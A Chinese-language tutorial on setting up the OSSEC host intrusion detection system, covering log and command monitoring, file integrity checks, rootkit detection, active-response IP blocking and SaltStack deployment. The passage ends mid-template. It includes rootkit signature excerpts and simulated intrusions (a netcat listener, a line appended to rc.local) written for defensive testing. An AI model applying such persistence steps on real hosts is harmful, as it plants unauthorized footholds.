0x01 概述


HIDS并不是一个新鲜的话题,规模较大的企业通常会选择自研。而如果你刚刚接手一个公司的网络安全、人手相对不足,那么OSSEC能帮助你在安全建设初期快速搭建起一套主机入侵检测系统,后期如果遇到瓶颈,再考虑用自研去解决问题。

 

0x02 主要功能介绍


OSSEC的主要功能包括日志分析、文件完整性检测、Rootkit检测以及联动配置,另外你也可以将自己的其他监控项集成到OSSEC中。

1)日志监控

日志是平常安全运维中很重要的一项,OSSEC的日志检测为实时检测。OSSEC的客户端本身没有解码文件和规则,所监控的日志会通过1514端口(默认UDP)发送到服务端,由服务端完成解码和规则匹配。
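
部署完成后,可以在Server端简单确认一下ossec-remoted是否已经监听了该端口:

netstat -anup | grep 1514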

配置项可以配置在每个Agent的ossec.conf中,或者统一配置在Server端下发的agent.conf中,都需要写在<localfile>标签内,可配置项如下:

location

指定日志文件的位置。日志文件名中可以使用strftime格式,例如一个名为file.log-2011-01-22的日志文件可以写为file.log-%Y-%m-%d。非Windows系统下可以使用通配符;使用通配符时,日志文件必须在ossec-logcollector启动时已经存在,它不会自动开始监控新出现的日志文件。strftime和通配符不能用在同一个条目上。
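
举个例子,要监控一个按日期轮转的日志文件(路径仅为示意),可以这样配置:

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/app/file.log-%Y-%m-%d</location>
  </localfile>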

log_format

例如syslog、command、full_command等等

需要注意的是command和full_command不能配置在agent.conf中,需要配置在ossec.conf中

command

执行的命令。如果log_format指定的是command,那么命令输出会被逐行读取、逐行匹配;如果指定的是full_command,则整个输出作为一条日志来匹配。

alias

该命令的别名。这将替换日志消息中的命令。

例如配置<alias>usb-check</alias>

ossec: output: 'reg QUERY HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR':

将被替换为

ossec: output: 'usb-check':
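
结合上面的输出,对应的<localfile>配置片段大致如下(Windows Agent上的USB检测示例):

  <localfile>
    <log_format>full_command</log_format>
    <command>reg QUERY HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR</command>
    <alias>usb-check</alias>
  </localfile>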

frequency

命令运行之间的最小时间间隔。时间间隔可能会比该值大,适用于log_format为command、full_command。

check_diff

事件的输出将存储在一个内部数据库中。每次接收到相同的事件时,输出都会与之前的输出相比较。如果输出发生了变化,将生成一个警告。

 

命令监控的具体事例:

默认的ossec.conf中自带的配置检查硬盘空间:

  <localfile>

    <log_format>command</log_format>

    <command>df -P</command>

  </localfile>

所对应的rule在ossec_rules.xml

  <rule id="531" level="7" ignore="7200">

    <if_sid>530</if_sid>

    <match>ossec: output: 'df -P': /dev/</match>

    <regex>100%</regex>

    <description>Partition usage reached 100% (disk space monitor).</description>

    <group>low_diskspace,</group>

  </rule>

默认的ossec.conf中自带的配置新增端口监听:

  <localfile>

    <log_format>full_command</log_format>

    <command>netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| ::1)' | sort</command>

  </localfile>

所对应的rule在ossec_rules.xml

  <rule id="533" level="7">

    <if_sid>530</if_sid>

    <match>ossec: output: 'netstat -tan</match>

    <check_diff />

    <description>Listened ports status (netstat) changed (new port opened or closed).</description>

  </rule>

执行的结果保存在queue/diff/下,每次执行会进行比对

[root@localhost ossec]# cat queue/diff/192.168.192.196/533/last-entry

ossec: output: 'netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort':

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:37498               0.0.0.0:*                   LISTEN     

tcp        0      0 :::111                      :::*                        LISTEN     

tcp        0      0 :::22                       :::*                        LISTEN     

tcp        0      0 :::62229                    :::*                        LISTEN

这里测试一下用nc监听2345端口,告警如下:

** Alert 1499397975.7591: mail  - ossec,

2017 Jul 07 11:26:15 (192.168.192.196) any->netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort

Rule: 533 (level 7) -> 'Listened ports status (netstat) changed (new port opened or closed).'

ossec: output: 'netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort':

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:2345                0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:37498               0.0.0.0:*                   LISTEN     

tcp        0      0 :::111                      :::*                        LISTEN     

tcp        0      0 :::22                       :::*                        LISTEN     

tcp        0      0 :::62229                    :::*                        LISTEN     

Previous output:

ossec: output: 'netstat -tan |grep LISTEN |egrep -v '(127.0.0.1| \\1)' | sort':

tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN     

tcp        0      0 0.0.0.0:37498               0.0.0.0:*                   LISTEN     

tcp        0      0 :::111                      :::*                        LISTEN     

tcp        0      0 :::22                       :::*                        LISTEN     

tcp        0      0 :::62229                    :::*                        LISTEN

之前在《Linux应急响应姿势浅谈》中提到过,Linux下的开机启动项是应急响应中很重要的检测项,RedHat的运行级别2、3、5都把/etc/rc.d/rc.local作为初始化脚本中的最后一个。这里我在Agent的ossec.conf中新加一个监控,当rc.local发生改变时告警。

  <localfile>

    <log_format>full_command</log_format>

    <command>/bin/cat /etc/rc.local</command>

    <frequency>10</frequency>

  </localfile>

在Server端的/var/ossec/rules/ossec_rules.xml下新增一条规则

  <rule id="536" level="7">

      <if_sid>530</if_sid>

      <match>ossec: output: '/bin/cat</match>

      <check_diff />     

      <description>rclocal changed</description>

  </rule>

然后重启Server和Agent

Agent执行echo "echo test" >> /etc/rc.local

报警如下:

** Alert 1499399596.13605: mail  - ossec,

2017 Jul 07 11:53:16 (192.168.192.196) any->/bin/cat /etc/rc.local

Rule: 536 (level 7) -> 'rclocal changed'

ossec: output: '/bin/cat /etc/rc.local':

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local

echo test

Previous output:

ossec: output: '/bin/cat /etc/rc.local':

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local

 

2)完整性检测

命令替换在应急响应中很常见,经常被替换掉的命令有ps、netstat、ss、lsof等,另外还有SSH后门。完整性检测的工作方式是Agent周期性地扫描系统文件,并将校验和发送给Server端,Server端存储并进行比对,发现修改时发出告警。

数据存放到服务端的/var/ossec/queue/syscheck目录下

[root@localhost syscheck]# ll /var/ossec/queue/syscheck

total 1388

-rw-r----- 1 ossec ossec 469554 Jun 29 03:16 (192.168.192.195) 192.168.192.195->syscheck

-rw-r----- 1 ossec ossec 469554 Jun 29 03:49 (192.168.192.196) 192.168.192.196->syscheck

-rw-r----- 1 ossec ossec 470797 Jun 29 18:13 syscheck

常用的配置如下:

<directories>

默认值是/etc,/usr/bin,/usr/sbin,/bin,/sbin,/boot

属性配置如下

realtime:实时监控

report_changes:报告文件变化,文件类型只能是文本

check_all:check_*全部为yes

check_sum:监测MD5和SHA1 HASH的变化,相当于设置check_sha1sum="yes"和check_md5sum="yes"

check_sha1sum:监测SHA1 HASH的变化

check_md5sum:监测MD5 HASH的变化

check_size:监测文件大小

check_owner:监测属主

check_group:监测属组

check_perm:监测文件权限

restrict:限制对包含该字符串的文件监测

 

<ignore>

配置忽略的文件和目录。所配置的文件和目录依然会检测,不过结果会忽略。

支持正则匹配<ignore type="sregex">.log$|.tmp</ignore>

<frequency>

检测周期

<scan_time>

开始扫描的时间,格式可以是21pm, 8:30, 12am

<scan_day>

配置一周中的哪天可以扫描,格式sunday, saturday, monday

<auto_ignore>

忽略变化超过3次的文件

<alert_new_files>

新文件创建时告警

<scan_on_start>

启动时扫描

<windows_registry>

Windows注册表项监控

<registry_ignore>

忽略的注册表项

<prefilter_cmd>

Prelink会修改二进制文件以加快其启动速度,这会导致二进制文件的MD5发生变化,从而产生误报。该配置的目的就是忽略掉Prelink产生的误报,配置为<prefilter_cmd>/usr/sbin/prelink -y</prefilter_cmd>。需要注意的是该配置会影响性能。

<skip_nfs>

跳过CIFS和NFS挂载目录

 

配置示例:

<syscheck>

    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>

    <directories check_all="yes">/root/users.txt,/bsd,/root/db.html</directories>

</syscheck>
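
把前面介绍的几个常用选项组合起来,一个参考配置大致如下(目录、扫描周期等均为示例值,请按实际环境调整):

<syscheck>
    <frequency>7200</frequency>
    <scan_on_start>yes</scan_on_start>
    <alert_new_files>yes</alert_new_files>
    <directories check_all="yes" report_changes="yes" realtime="yes">/etc</directories>
    <directories check_all="yes">/usr/bin,/usr/sbin,/bin,/sbin</directories>
    <ignore>/etc/mtab</ignore>
    <ignore type="sregex">.log$|.tmp</ignore>
    <prefilter_cmd>/usr/sbin/prelink -y</prefilter_cmd>
</syscheck>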

修改告警级别,例如当/var/www/htdocs修改时,告警级别修改为12

<rule id="100345" level="12">

    <if_matched_group>syscheck</if_matched_group>

    <match>/var/www/htdocs</match>

    <description>Changes to /var/www/htdocs - Critical file!</description>

</rule>

这里有一个需要注意的地方,我一开始使用OSSEC的时候,用的默认配置,然后凌晨3点的时候收到了大量的告警,如下:

** Alert 1500341372.94081: mail - ossec,syscheck,

2017 Jul 18 09:29:32 localhost->syscheck

Rule: 550 (level 7) -> 'Integrity checksum changed.'

Integrity checksum changed for: '/sbin/partprobe'

Old md5sum was: 'cabd9d003c9f3b194b32eff8d27e9dfc'

New md5sum is : '34a3700736e54368e296c24acef6f5b9'

Old sha1sum was: '0eb531a5bce4fdf30da3d69aed181b54b4870f0b'

New sha1sum is : '19640bd6d1ebc4298423498a9363dfe2074023ad'



** Alert 1500341380.94500: mail - ossec,syscheck,

2017 Jul 18 09:29:40 localhost->syscheck

Rule: 550 (level 7) -> 'Integrity checksum changed.'

Integrity checksum changed for: '/sbin/wipefs'

Old md5sum was: '61ddf66c79323caff5d8254a29b526dc'

New md5sum is : '45af33cff81598dd0a33f0439c6aa68f'

Old sha1sum was: '161d409336291c8ed03a89bd8378739934dca387'

New sha1sum is : 'a735876ea2090323bd766cfb6bad0f57c6a900f2'

告警显示/sbin下的可执行文件MD5都变了,其实是定时任务Prelink导致的。Prelink利用事先链接代替运行时链接来加速共享库的加载,不仅可以加快启动速度,还能减少部分内存开销,是Linux上常用的缩短程序加载时间和系统启动时间的工具。

 

以CentOS6.5系统为例,

[root@sec248 cron.daily]# ls

logrotate  makewhatis.cron  mlocate.cron  prelink  readahead.cron  tmpwatch

prelink脚本内容如下:

#!/bin/sh



. /etc/sysconfig/prelink



renice +19 -p $$ >/dev/null 2>&1



if [ "$PRELINKING" != yes ]; then

  if [ -f /etc/prelink.cache ]; then

    echo /usr/sbin/prelink -uav > /var/log/prelink/prelink.log

    /usr/sbin/prelink -uav >> /var/log/prelink/prelink.log 2>&1 \

      || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log

    rm -f /etc/prelink.cache

    # Restart init if needed

    [ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u

  fi

  exit 0

fi



if [ ! -f /etc/prelink.cache -o -f /var/lib/prelink/force ] \

   || grep -q '^prelink-ELF0.[0-2]' /etc/prelink.cache; then

  # If cache does not exist or is from older prelink versions or

  # if we were asked to explicitely, force full prelinking

  rm -f /etc/prelink.cache /var/lib/prelink/force

  PRELINK_OPTS="$PRELINK_OPTS -f"

  date > /var/lib/prelink/full

  cp -a /var/lib/prelink/{full,quick}

elif [ -n "$PRELINK_FULL_TIME_INTERVAL" \

       -a "`find /var/lib/prelink/full -mtime -${PRELINK_FULL_TIME_INTERVAL} 2>/dev/null`" \

         = /var/lib/prelink/full ]; then

  # If no more than PRELINK_NONRPM_CHECK_INTERVAL days elapsed from last prelink

  # (be it full or quick) and no packages have been upgraded via rpm since then,

  # don't do anything.

  [ "`find /var/lib/prelink/quick -mtime -${PRELINK_NONRPM_CHECK_INTERVAL:-7} 2>/dev/null`" \

    -a -f /var/lib/rpm/Packages \

    -a /var/lib/rpm/Packages -ot /var/lib/prelink/quick ] && exit 0

  date > /var/lib/prelink/quick

  # If prelink without -q has been run in the last

  # PRELINK_FULL_TIME_INTERVAL days, just use quick mode

  PRELINK_OPTS="$PRELINK_OPTS -q"

else

  date > /var/lib/prelink/full

  cp -a /var/lib/prelink/{full,quick}

fi



echo /usr/sbin/prelink -av $PRELINK_OPTS > /var/log/prelink/prelink.log

/usr/sbin/prelink -av $PRELINK_OPTS >> /var/log/prelink/prelink.log 2>&1 \

  || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log

# Restart init if needed

[ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u



exit 0

 

/etc/sysconfig/prelink文件内容如下:

[root@localhost cron.daily]# cat /etc/sysconfig/prelink | grep -v '^$' | grep -v '^#'

PRELINKING=yes

PRELINK_OPTS=-mR

PRELINK_FULL_TIME_INTERVAL=14

PRELINK_NONRPM_CHECK_INTERVAL=7

通过阅读上面的脚本可以知道,每14天会进行一次完整(full)的Prelink操作,也就是执行

/usr/sbin/prelink -av -mR

平时每天执行的Prelink操作其实是quick模式,也就是执行

/usr/sbin/prelink -av -mR -q

 

解决方案是添加配置

<prefilter_cmd>/usr/sbin/prelink -y</prefilter_cmd>

在比对MD5或者SHA1之前,会先执行prelink -y <file>,从而避免误报。prelink -y <file>会输出prelink之前的原始文件内容。
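
可以手工对比一下来理解这个机制:对已经做过prelink的二进制文件,直接计算的MD5和用prelink -y还原出原始内容后计算的MD5是不一样的(输出值因机器而异):

# 当前(prelink后)文件的MD5
md5sum /bin/ls
# prelink -y 输出prelink之前的原始内容,对其计算MD5
prelink -y /bin/ls | md5sum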

 

过了一段时间,突然一台机器上收到大量告警,所监控二进制文件的SHA都变成了da39a3ee5e6b4b0d3255bfef95601890afd80709。

然后我查看了OSSEC服务端的记录信息/var/ossec/queue/syscheck,syscheck记录内容如下:

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341371 /usr/bin/jdb

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341375 /usr/bin/policytool

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341397 /usr/bin/jmap

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341405 /usr/bin/javah

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341436 /usr/bin/appletviewer

./(10.59.0.238) any->syscheck:+++0:0:0:0:xxx:da39a3ee5e6b4b0d3255bfef95601890afd80709 !1531341448 /usr/bin/javac

的确好多二进制文件的SHA值都变成了da39a3ee5e6b4b0d3255bfef95601890afd80709,其实这是空字符串的SHA1值。我手工执行Prelink测试一下

[root@localhost cron.daily]# prelink -y /bin/sh

at least one of file's dependencies has changed since prelinking

看起来原因是自从最后一次Prelink操作后,有些依赖库被修改了。既然是依赖库变了,那么多半是运维升级了什么东西导致的。

搜索了一下Bash记录,发现的确是运维升级了Java相关包。

解决方法就是执行一次完整的Prelink操作,quick模式无法修复该问题。

/usr/sbin/prelink -av -mR

 

3)Rootkit检测

Rootkit也是平时应急响应中比较头疼的问题,OSSEC的检测原理如下:

对比rootkit_files.txt,该文件中包含了rootkit常用的文件,类似于病毒库。

[root@localhost shared]# egrep -v "^#" rootkit_files.txt | grep -v '^$' | head -n 3

tmp/mcliZokhb           ! Bash door ::/rootkits/bashdoor.php

tmp/mclzaKmfa           ! Bash door ::/rootkits/bashdoor.php

dev/.shit/red.tgz       ! Adore Worm ::/rootkits/adorew.php

如果是以"*"开头的话,会扫描整个系统。

对比rootkit_trojans.txt文件中二进制文件特征。

[root@localhost shared]# egrep -v "^#" rootkit_trojans.txt | grep -v '^$' | head -n 3

ls          !bash|^/bin/sh|dev/[^clu]|\.tmp/lsfile|duarawkz|/prof|/security|file\.h!

env         !bash|^/bin/sh|file\.h|proc\.h|/dev/|^/bin/.*sh!

echo        !bash|^/bin/sh|file\.h|proc\.h|/dev/[^cl]|^/bin/.*sh!

扫描整个文件系统,检测异常文件和异常的权限设置。文件属主是root但其他用户可写的文件是非常危险的,rootcheck会扫描这些文件,同时还会检测具有suid权限的文件、隐藏的文件和目录。

另外还会检测隐藏端口、隐藏进程、/dev目录、网卡混杂模式等。

这里看一下ossec.conf中默认的rootcheck的配置

  <rootcheck>

    <rootkit_files>/var/ossec/etc/shared/rootkit_files.txt</rootkit_files>

    <rootkit_trojans>/var/ossec/etc/shared/rootkit_trojans.txt</rootkit_trojans>

    <system_audit>/var/ossec/etc/shared/system_audit_rcl.txt</system_audit>

    <system_audit>/var/ossec/etc/shared/cis_debian_linux_rcl.txt</system_audit>

    <system_audit>/var/ossec/etc/shared/cis_rhel_linux_rcl.txt</system_audit>

    <system_audit>/var/ossec/etc/shared/cis_rhel5_linux_rcl.txt</system_audit>

  </rootcheck>

/var/ossec/etc/shared/rootkit_files.txt文件中包含了rootkit常用的文件。

/var/ossec/etc/shared/rootkit_trojans.txt文件中检测一些二进制文件的特征。

后面几个system_audit文件主要用于检测系统配置(安全基线)。

测试:

server:192.168.192.193

agent:192.168.192.196

根据上述检测原理第一条,我们在192.168.192.196下创建文件/tmp/mcliZokhb

然后在Server端执行

[root@localhost ossec]# ./bin/agent_control -r -u 1028

OSSEC HIDS agent_control: Restarting Syscheck/Rootcheck on agent: 1028

当扫描完成后,Syscheck last started和Rootcheck last started的时间会更新。

[root@localhost rootcheck]# /var/ossec/bin/agent_control -i 1028



OSSEC HIDS agent_control. Agent information:

   Agent ID:   1028

   Agent Name: 192.168.192.196

   IP address: any/0

   Status:     Active



   Operating system:    Linux localhost 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64

   Client version:      OSSEC HIDS v2.9.0 / 2d13fc898c1b864609180ad7f4512b4c

   Last keep alive:     Thu Jul 13 14:11:25 2017



   Syscheck last started  at: Thu Jul 13 14:05:27 2017

   Rootcheck last started at: Thu Jul 13 13:55:00 2017

来看一下/var/ossec/queue/rootcheck下的内容

[root@localhost rootcheck]# cat \(192.168.192.196\)\ any-\>rootcheck

!1499925300!1499150323 Starting rootcheck scan.

!1499925927!1499150951 Ending rootcheck scan.

!1499925300!1499925300 Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'.

其中扫描开始时间为1499925300(2017/7/13 13:55:00),扫描结束时间为1499925927(2017/7/13 14:05:27),并在1499925300(2017/7/13 13:55:00)检测到了Rootkit文件。

然后查看ALert日志中的告警信息

[root@localhost rootcheck]# cat /var/ossec/logs/alerts/alerts.log

** Alert 1499925300.0: mail  - ossec,rootcheck,

2017 Jul 13 13:55:00 (192.168.192.196) any->rootcheck

Rule: 510 (level 7) -> 'Host-based anomaly detection event (rootcheck).'

Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'.

PS:

1)部署后,发现经常会收到进程隐藏的告警,经排查服务器也不存在异常。

Process '25905' hidden from /proc. Possible kernel level rootkit.

添加规则rules/ossec_rules.xml

  <rule id="517" level="0">

     <if_sid>510</if_sid>

     <match>hidden from /proc</match>

     <description>Ignored process hidden entries.</description>

     <group>rootcheck,</group>

  </rule>

屏蔽掉该告警。

2)因为OSSEC会检测属主是Root但是Other用户有w权限的文件,有些正常业务的文件会导致误报。

添加规则rules/ossec_rules.xml

  <rule id="520" level="0">

     <if_sid>510</if_sid>

     <match>/usr/local/fms</match>

     <description>Ignored some files which owned by root and has write permissions.</description>

     <group>rootcheck,</group>

  </rule>

屏蔽掉这些目录。

3)新增用户/组的告警白名单

vim syslog_rules.xml

  <rule id="5905" level="0">
    <if_sid>5901</if_sid>
    <match>name=flume</match>
    <description>New group Ignore</description>
  </rule>

  <rule id="5906" level="0">
    <if_sid>5902</if_sid>
    <match>name=flume</match>
    <description>New user Ignore</description>
  </rule>

添加flume的白名单用户

 

4)联动配置

主动响应(Active Response)分为两部分:第一步配置需要执行的脚本(command),第二步将该command绑定到具体的触发规则(active-response)。/var/ossec/etc/ossec.conf中相应配置如下:

<ossec_config>

    <command>

        <!--

        Command options here

        -->

    </command>

    <active-response>

        <!--

        active-response options here

        -->

    </active-response>

</ossec_config>

Command配置参数如下:

name

对应active-response所使用的名称

executable

/var/ossec/active-response/bin中的可执行文件,不需要写全路径。

expect

命令执行所需的参数,可选值为srcip和user(不接受其他值)。如果expect标签内对应的值为空,那么会传递-来代替真实的值。如果一个响应脚本需要srcip,那么srcip必须出现在expect选项中。

如果不需要传递参数值,写<expect></expect>即可。

timeout_allowed

指定该命令是否支持超时。

 

active-response配置参数如下:

disabled

如果设置为yes,则禁用主动响应,默认为启用。

command

需要执行的脚本的名称,对应command标签中的name。

location

在哪里执行命令,具体参数如下:

local: 产生该事件的agent

server: 在server端

defined-agent: 指定一个agent,需要配置agent id

all: 所有agent

agent_id

需要执行脚本的agent的ID

level

大于等于该level的event将执行该响应

rules_group

响应将在已定义的组中的任何事件上执行。可以用逗号分隔多个组。

rules_id

响应将在任何带有已定义ID的事件上执行。可以用逗号分隔多个ID。

timeout

以封禁IP为例,指定IP封禁的时间(单位为秒)。

 

这里我们来测试一下:

Server:192.168.192.193

Client(ID:1029)192.168.192.195

Client(ID:1028) 192.168.192.196

首先看一下SSH登录失败的日志为:

Jul  6 15:15:57 localhost sshd[28590]: Failed password for root from 192.168.192.196 port 34108 ssh2

所对应的decode.xml中的解码规则为:

<decoder name="ssh-failed">

  <parent>sshd</parent>

  <prematch>^Failed \S+ </prematch>

  <regex offset="after_prematch">^for (\S+) from (\S+) port \d+ \w+$</regex>

  <order>user, srcip</order>

</decoder>

这里通过正则表达式获取到了user和srcip

所对应的Rule在sshd_rules.xml中,可以看到告警等级为5:

  <rule id="5716" level="5">

    <if_sid>5700</if_sid>

    <match>^Failed|^error: PAM: Authentication</match>

    <description>SSHD authentication failed.</description>

    <group>authentication_failed,</group>

  </rule>

查看ossec.conf,这里我们添加如下:

  <active-response>

    <command>test</command>

    <location>local</location>

    <level>5</level>

    <timeout>60</timeout>

  </active-response>

所对应的执行脚本名称为test,脚本在本地(触发事件的Agent上)执行,当rule级别大于等于5时触发,超时时间为60秒,超时后会再以delete动作调用一次脚本。

所对应的command配置为

  <command>

    <name>test</name>

    <executable>test.sh</executable>

    <expect>srcip,user</expect>

    <timeout_allowed>yes</timeout_allowed>

  </command>

这里传递了两个参数srcip,user(前后顺序不影响)。所对应的是ssh-failed解码规则中取到的user和srcip。

/var/ossec/active-response/bin/test.sh文件内容为

#!/bin/sh

LOCAL=`dirname $0`;

cd $LOCAL

cd ../

PWD=`pwd`

echo "`date` $0 $1 $2 $3 $4 $5" >> ${PWD}/../logs/active-responses.log

脚本所传递的参数如下:

$1 动作 (delete or add)

$2 user (or - if not set)

$3 srcip (or - if not set)

$4 时间戳

$5 规则号
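
下面是一个利用这些参数做IP封禁的最小示例脚本(仅作演示参数用法,实际可直接使用OSSEC自带的firewall-drop.sh、host-deny.sh等脚本):

#!/bin/sh
# $1=动作(add/delete) $2=user $3=srcip
ACTION=$1
SRCIP=$3

if [ "$ACTION" = "add" ]; then
    /sbin/iptables -I INPUT -s "$SRCIP" -j DROP
elif [ "$ACTION" = "delete" ]; then
    /sbin/iptables -D INPUT -s "$SRCIP" -j DROP
fi
exit 0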

 

修改权限和属组

[root@localhost bin]# chown root:ossec test.sh

[root@localhost bin]# chmod 550 test.sh

 

然后在192.168.192.196使用错误密码登录192.168.192.193,触发规则,查看日志

[root@localhost ossec]# tail -f logs/active-responses.log

Thu Jul  6 17:07:02 CST 2017 /var/ossec/active-response/bin/test.sh add root 192.168.192.196 1499332022.14278 5503

Thu Jul  6 17:08:32 CST 2017 /var/ossec/active-response/bin/test.sh delete root 192.168.192.196 1499332022.14278 5503

然后我们再用OSSEC自带的host-deny脚本测试一下。

  <command>

    <name>host-deny</name>

    <executable>host-deny.sh</executable>

    <expect>srcip</expect>

    <timeout_allowed>yes</timeout_allowed>

  </command>

  <active-response>

    <command>host-deny</command>

    <location>local</location>

    <level>5</level>

    <timeout>30</timeout>

  </active-response>

这里<location>local</location>,即只在触发该规则的Agent本机上执行。

然后我使用另外一台机器192.168.192.120使用错误密码登录192.168.192.196

触发规则后查看hosts.deny发现已经添加了IP192.168.192.120

[root@localhost ossec]# cat /etc/hosts.deny  | grep 120

ALL:192.168.192.120

 

0x03 SaltStack批量部署Agent



在企业内部通常会有各种运维工具用于批量管理服务器,例如SaltStack、Ansible等,这里我以SaltStack为例。批量部署主要面临两个问题:

1)install.sh安装交互问题

OSSEC安装为交互式安装,需要手工输入Server端地址、选择是否开启某些模块等。解决办法是预先配置preloaded-vars.conf

[root@localhost ossec-hids-2.9.0]# cp etc/preloaded-vars.conf.example etc/preloaded-vars.conf

修改preloaded-vars.conf中的配置即可。最终配置如下:

[root@test135 etc]# cat preloaded-vars.conf | grep -v "^#" | grep -v "^$"

USER_LANGUAGE="cn"     # For english

USER_NO_STOP="y"

USER_INSTALL_TYPE="agent"

USER_DIR="/var/ossec"

USER_ENABLE_ACTIVE_RESPONSE="y"

USER_ENABLE_SYSCHECK="y"

USER_ENABLE_ROOTCHECK="y"

USER_AGENT_SERVER_IP="10.111.111.111"

2)Key认证问题

新版本的OSSEC中ossec-authd和agent-auth提供了自动化导入Key的功能。

ossec-authd:

ossec-authd守护进程运行在服务端,自动分发Key和添加Agent。

默认情况下,该过程中不存在任何身份验证或授权,因此建议只在添加新代理时运行该守护进程。

ossec-authd进程需要SSL keys才能运行。

如果没有SSL Keys会提示以下错误:

[root@localhost syscheck]# /var/ossec/bin/ossec-authd -p 1515

2017/07/04 14:02:26 ossec-authd: INFO: Started (pid: 12764).

2017/07/04 14:02:26 ossec-authd: ERROR: Unable to read certificate file (not found): /var/ossec/etc/sslmanager.cert

2017/07/04 14:02:26 ossec-authd: ERROR: SSL error. Exiting.

生成SSL Keys

[root@localhost syscheck]# openssl genrsa -out /var/ossec/etc/sslmanager.key 2048

Generating RSA private key, 2048 bit long modulus

.....+++

........+++

e is 65537 (0x10001)

[root@localhost syscheck]# openssl req -new -x509 -key /var/ossec/etc/sslmanager.key -out /var/ossec/etc/sslmanager.cert -days 365

You are about to be asked to enter information that will be incorporated

into your certificate request.

What you are about to enter is what is called a Distinguished Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [XX]:

State or Province Name (full name) []:

Locality Name (eg, city) [Default City]:

Organization Name (eg, company) [Default Company Ltd]:

Organizational Unit Name (eg, section) []:

Common Name (eg, your name or your server's hostname) []:

Email Address []:

启动ossec-authd

[root@localhost syscheck]# /var/ossec/bin/ossec-authd

2017/07/04 14:11:35 ossec-authd: INFO: Started (pid: 12788).

[root@localhost syscheck]# netstat -anlp | grep 1515

tcp        0      0 :::1515                     :::*                        LISTEN      12788/ossec-authd

然后在客户端运行agent-auth,如果不通过-A指定名称的话,默认使用Hostname作为Agent名称

[root@localhost src]# /var/ossec/bin/agent-auth -m 192.168.192.193 -p 1515 -A 192.168.192.196

2017/07/04 14:27:59 ossec-authd: INFO: Started (pid: 14137).

2017/07/04 14:27:59 INFO: Connected to 192.168.192.193 at address 192.168.192.193, port 1515

INFO: Connected to 192.168.192.193:1515

INFO: Using agent name as: 192.168.192.196

INFO: Send request to manager. Waiting for reply.

INFO: Received response with agent key

INFO: Valid key created. Finished.

INFO: Connection closed.

查看服务端:

2017/07/04 14:27:59 ossec-authd: INFO: New connection from 192.168.192.196

2017/07/04 14:27:59 ossec-authd: INFO: Received request for a new agent (192.168.192.196) from: 192.168.192.196

2017/07/04 14:27:59 ossec-authd: INFO: Agent key generated for 192.168.192.196 (requested by 192.168.192.196)

2017/07/04 14:27:59 ossec-authd: INFO: Agent key created for 192.168.192.196 (requested by 192.168.192.196)

重启客户端服务/var/ossec/bin/ossec-control restart

查看当前连接的Agents

[root@localhost alerts]# /var/ossec/bin/agent_control -lc



OSSEC HIDS agent_control. List of available agents:

   ID: 000, Name: localhost (server), IP: 127.0.0.1, Active/Local

   ID: 1028, Name: 192.168.192.196, IP: any, Active

启动Agent时的INFO信息

2017/12/13 09:32:18 ossec-agentd: INFO: Using notify time: 600 and max time to reconnect: 1800

可以看到keepalive的时间间隔为10Min,最大重连时间为30Min。

[root@sec248 etc]# /var/ossec/bin/agent_control -i 1024 | grep keep

Last keep alive:     Wed Dec 13 09:34:06 2017

可以查看agent的上次keepalive时间,超过最大重连时间,会有告警。
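
如果Agent数量较多,也可以基于agent_control的输出做一个简单的巡检,把掉线的Agent过滤出来(状态字符串以实际版本的输出为准):

/var/ossec/bin/agent_control -l | grep -E 'Disconnected|Never connected'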

综合上述两个问题,最终Salt部署模板如下:

include:

  - mk_Downloads



install_packages:

  pkg.latest:

    - pkgs:

      - openssl-devel

      - gcc

      - prelink



install_ossec:

  cmd.run:

    - name: tar zxf ossec.tar.gz && cd ossec && sh install.sh

    - cwd: /root/Downloads

    - unless: test -e /var/ossec/bin/ossec-control

    - require:

      - file: /root/Downloads/ossec.tar.gz



/var/ossec/etc/ossec.conf:

  file.managed:

    - source: salt://ossec/conf/ossec.conf

    - user: root

    - group: root

    - mode: 644

    - template: jinja

    - require:

      - cmd: install_ossec



/var/ossec/etc/shared/agent.conf:

  file.managed:

    - source: salt://ossec/conf/agent.conf

    - user: root

